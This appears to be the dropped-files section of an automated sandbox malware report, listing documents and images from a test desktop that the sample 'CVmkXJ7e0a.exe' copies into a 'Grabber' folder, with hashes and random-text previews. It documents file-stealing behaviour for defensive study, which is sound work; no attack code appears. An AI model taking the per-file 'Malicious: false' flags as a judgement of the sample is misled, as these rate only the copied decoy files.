SHA-512:	A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
Malicious:	false
Preview:	BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\BNAGMGSPLO.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701704028955216
Encrypted:	false
SSDEEP:	24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
MD5:	5F97B24D9F05FA0379F5E540DA8A05B0
SHA1:	D4E1A893EFD370529484B46EE2F40595842C849E
SHA-256:	58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
SHA-512:	A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
Malicious:	false
Preview:	BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\BNAGMGSPLO\BNAGMGSPLO.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701704028955216
Encrypted:	false
SSDEEP:	24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
MD5:	5F97B24D9F05FA0379F5E540DA8A05B0
SHA1:	D4E1A893EFD370529484B46EE2F40595842C849E
SHA-256:	58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
SHA-512:	A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
Malicious:	false
Preview:	BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\BNAGMGSPLO\DUUDTUBZFW.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	false
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\BNAGMGSPLO\EFOYFBOLXA.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\BNAGMGSPLO\EWZCVGNOWT.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\BNAGMGSPLO\JDDHMPCDUJ.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	false
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	false
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
